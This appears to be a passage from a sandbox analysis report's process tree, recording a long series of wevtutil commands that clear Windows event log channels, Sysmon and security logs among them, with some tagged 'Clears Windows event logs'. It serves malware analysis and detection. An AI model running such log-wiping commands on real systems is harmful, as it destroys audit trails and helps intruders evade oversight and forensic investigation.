C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RRAS/Operational"
2⤵
- Clears Windows event logs
PID:4992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RadioManager/Analytic"
2⤵
PID:4752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
2⤵
PID:4580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RasAgileVpn/Debug"
2⤵
PID:3736

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RasAgileVpn/Operational"
2⤵
PID:3832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReFS/Operational"
2⤵
PID:4904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Analytic"
2⤵
PID:2660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Operational"
2⤵
PID:4524

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Analytic"
2⤵
- Clears Windows event logs
PID:1904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Operational"
2⤵
PID:2764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Regsvr32/Operational"
2⤵
PID:292

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
2⤵
PID:400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
2⤵
PID:448

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Admin"
2⤵
PID:3872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Operational"
2⤵
PID:1556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Tracing"
2⤵
PID:3296

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
2⤵
PID:4880

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
2⤵
PID:2876

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
2⤵
PID:3020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
2⤵
PID:2992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
2⤵
PID:4608

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
2⤵
PID:2412

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
2⤵
PID:3436

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
2⤵
PID:4656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Remotefs-Rdbss/Operational"
2⤵
- Clears Windows event logs
PID:532

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ResetEng-Trace/Diagnostic"
2⤵
PID:4044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
2⤵
PID:1260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
2⤵
PID:2664

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ResourcePublication/Tracing"
2⤵
PID:3400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RestartManager/Operational"
2⤵
PID:388

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RetailDemo/Admin"
2⤵
PID:4400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RetailDemo/Operational"
2⤵
PID:2592

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-Graphics/Analytic"
2⤵
PID:2496

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
2⤵
PID:1724

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-Networking/Tracing"
2⤵
PID:2136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-Web-Http/Tracing"
2⤵
PID:5052

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-WebAPI/Tracing"
2⤵
PID:1164

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
2⤵
PID:3656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
2⤵
PID:1900

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
2⤵
PID:4780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
2⤵
PID:2560

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime/CreateInstance"
2⤵
PID:2924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Runtime/Error"
2⤵
PID:4484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBClient/Analytic"
2⤵
PID:2860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
2⤵
PID:3884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
2⤵
PID:3632

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBClient/Operational"
2⤵
PID:3480

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBDirect/Admin"
2⤵
PID:4408

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBDirect/Debug"
2⤵
PID:2720

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBDirect/Netmon"
2⤵
- Clears Windows event logs
PID:1936

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBServer/Analytic"
2⤵
PID:5008

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBServer/Audit"
2⤵
PID:612

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBServer/Connectivity"
2⤵
PID:4624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBServer/Diagnostic"
2⤵
PID:2704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBServer/Operational"
2⤵
PID:3188

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBServer/Performance"
2⤵
PID:4116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBServer/Security"
2⤵
PID:3260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Admin"
2⤵
PID:3460

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Informational"
2⤵
PID:4832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SPB-ClassExtension/Analytic"
2⤵
PID:2000

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SPB-HIDI2C/Analytic"
2⤵
PID:936

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Schannel-Events/Perf"
2⤵
PID:4380

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sdbus/Analytic"
2⤵
PID:3324

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sdbus/Debug"
2⤵
PID:3580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sdstor/Analytic"
2⤵
PID:4376

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"
2⤵
PID:4828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
2⤵
PID:2836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SearchUI/Diagnostic"
2⤵
PID:212

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SearchUI/Operational"
2⤵
PID:904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SecureAssessment/Operational"
2⤵
PID:2484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Adminless/Operational"
2⤵
PID:1096

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
2⤵
- Clears Windows event logs
PID:772

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
2⤵
PID:2644

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
2⤵
PID:4948

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
2⤵
PID:1700

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
2⤵
PID:3888

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"
2⤵
PID:4796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-IdentityStore/Performance"
2⤵
PID:4808

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
2⤵
PID:4384

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Mitigations/KernelMode"
2⤵
PID:4416

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Mitigations/UserMode"
2⤵
PID:4972

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Netlogon/Operational"
2⤵
PID:3680

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
2⤵
PID:5000

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
2⤵
PID:3428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
2⤵
PID:3636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX/Analytic"
2⤵
PID:4924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"
2⤵
PID:384

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-UserConsentVerifier/Audit"
2⤵
PID:1340

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Vault/Performance"
2⤵
PID:440

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Admin"
2⤵
PID:4364

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Operational"
2⤵
PID:3760

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Perf"
2⤵
PID:4372

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SendTo/Diagnostic"
2⤵
PID:3676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sens/Debug"
2⤵
PID:3036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sensors/Debug"
2⤵
PID:3328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sensors/Performance"
2⤵
PID:2952

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
2⤵
PID:1564

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension/Analytic"
2⤵
PID:1664

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"
2⤵
PID:2228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"
2⤵
PID:3468

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"
2⤵
PID:1416

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Servicing/Debug"
2⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Debug"
2⤵
PID:1100

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Operational"
2⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Analytic"
2⤵
PID:1312

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Debug"
2⤵
PID:4992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Operational"
2⤵
PID:4752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync/Analytic"
2⤵
PID:4580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync/Debug"
2⤵
PID:4080

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync/Operational"
2⤵
PID:1248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SettingSync/VerboseDebug"
2⤵
PID:4896

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Setup/Analytic"
2⤵
PID:4864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"
2⤵
PID:692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SetupPlatform/Analytic"
2⤵
PID:1904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"
2⤵
PID:4072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"
2⤵
PID:3864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
2⤵
PID:1784

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
2⤵
PID:2792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
2⤵
PID:5088

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
2⤵
PID:4312

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
2⤵
PID:284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
2⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
2⤵
PID:4944

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
2⤵
PID:2104

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
2⤵
PID:3756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
2⤵
PID:2996

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-Core/ActionCenter"
2⤵
PID:2412

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-Core/AppDefaults"
2⤵
PID:3436

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"
2⤵
PID:4656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-Core/LogonTasksChannel"
2⤵
PID:532

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-Core/Operational"
2⤵
PID:4044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
2⤵
- Clears Windows event logs
PID:1260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
2⤵
PID:2664

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-OpenWith/Diagnostic"
2⤵
PID:3400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"
2⤵
PID:388

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
2⤵
PID:4400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
2⤵
PID:2592

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
2⤵
- Clears Windows event logs
PID:2496

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"
2⤵
PID:1724

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SleepStudy/Diagnostic"
2⤵
PID:3572

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmartCard-Audit/Authentication"
2⤵
PID:2468

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
2⤵
PID:3796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
2⤵
PID:764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
2⤵
PID:2760

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmartScreen/Debug"
2⤵
PID:1924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmbClient/Audit"
2⤵
PID:2336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmbClient/Connectivity"
2⤵
PID:4484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmbClient/Diagnostic"
2⤵
PID:2860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SmbClient/Security"
2⤵
PID:3236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Speech-UserExperience/Diagnostic"
2⤵
PID:4152

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Spell-Checking/Analytic"
2⤵
PID:1360

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SpellChecker/Analytic"
2⤵
PID:3780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Spellchecking-Host/Analytic"
2⤵
PID:2940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SruMon/Diagnostic"
2⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SrumTelemetry"
2⤵
PID:4508

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StateRepository/Debug"
2⤵
PID:512

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StateRepository/Diagnostic"
2⤵
PID:396

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StateRepository/Operational"
2⤵
PID:4412

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StateRepository/Restricted"
2⤵
- Clears Windows event logs
PID:2432

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorDiag/Operational"
2⤵
PID:4648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorPort/Operational"
2⤵
PID:3948

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Admin"
2⤵
PID:2856

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Analytic"
2⤵
PID:1688

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Debug"
2⤵
PID:2812

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Diagnose"
2⤵
PID:4952

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Operational"
2⤵
PID:4264

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Admin"
2⤵
PID:1300

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Analytic"
2⤵
PID:812

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Debug"
2⤵
PID:2636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Diagnose"
2⤵
PID:4068

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Operational"
2⤵
PID:5064

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Admin"
2⤵
PID:1352

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Analytic"
2⤵
PID:1092

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Debug"
2⤵
PID:640

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Diagnose"
2⤵
PID:4908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Operational"
2⤵
- Clears Windows event logs
PID:2804

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Admin"
2⤵
PID:3620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Analytic"
2⤵
PID:2872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Debug"
2⤵
PID:4860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Diagnose"
2⤵
PID:3744

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Health"
2⤵
PID:728

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Operational"
2⤵
PID:1928

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Tiering-IoHeat/Heat"
2⤵
PID:2632

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storage-Tiering/Admin"
2⤵
PID:4384

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageManagement/Debug"
2⤵
PID:4416

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageManagement/Operational"
2⤵
PID:4972

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageSettings/Diagnostic"
2⤵
PID:3680

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageSpaces-Driver/Diagnostic"
2⤵
PID:5000

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageSpaces-Driver/Operational"
2⤵
PID:3428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageSpaces-Driver/Performance"
2⤵
PID:3636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageSpaces-ManagementAgent/WHC"
2⤵
PID:4924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageSpaces-SpaceManager/Diagnostic"
2⤵
PID:384

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorageSpaces-SpaceManager/Operational"
2⤵
PID:1340

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Store/Operational"
2⤵
PID:4836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Storsvc/Diagnostic"
2⤵
- Clears Windows event logs
PID:1232

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Subsys-Csr/Operational"
2⤵
PID:232

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Subsys-SMSS/Operational"
2⤵
PID:4064

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Superfetch/Main"
2⤵
PID:3676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Superfetch/PfApLog"
2⤵
- Clears Windows event logs
PID:3036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Superfetch/StoreLog"
2⤵
- Clears Windows event logs
PID:3568

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sysmon/Operational"
2⤵
PID:2604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sysprep/Analytic"
2⤵
PID:220

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-System-Profile-HardwareId/Diagnostic"
2⤵
PID:5036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SystemSettingsHandlers/Debug"
2⤵
PID:5068

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SystemSettingsThreshold/Debug"
2⤵
PID:3424

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SystemSettingsThreshold/Diagnostic"
2⤵
PID:464

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SystemSettingsThreshold/Operational"
2⤵
PID:2184

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TCPIP/Diagnostic"
2⤵
PID:288

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TCPIP/Operational"
2⤵
PID:4060

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Debug"
2⤵
PID:272

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Diagnostic"
2⤵
PID:2204

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Debug"
2⤵
PID:3736

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Diagnostic"
2⤵
PID:4580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TTS/Diagnostic"
2⤵
PID:4080

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TWinAPI/Diagnostic"
2⤵
PID:1248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TWinUI/Diagnostic"
2⤵
PID:4896

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TWinUI/Operational"
2⤵
PID:4864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TZSync/Analytic"
2⤵
PID:872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TZSync/Operational"
2⤵
PID:4072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TZUtil/Operational"
2⤵
PID:400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Debug"
2⤵
PID:4284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Diagnostic"
2⤵
PID:5088

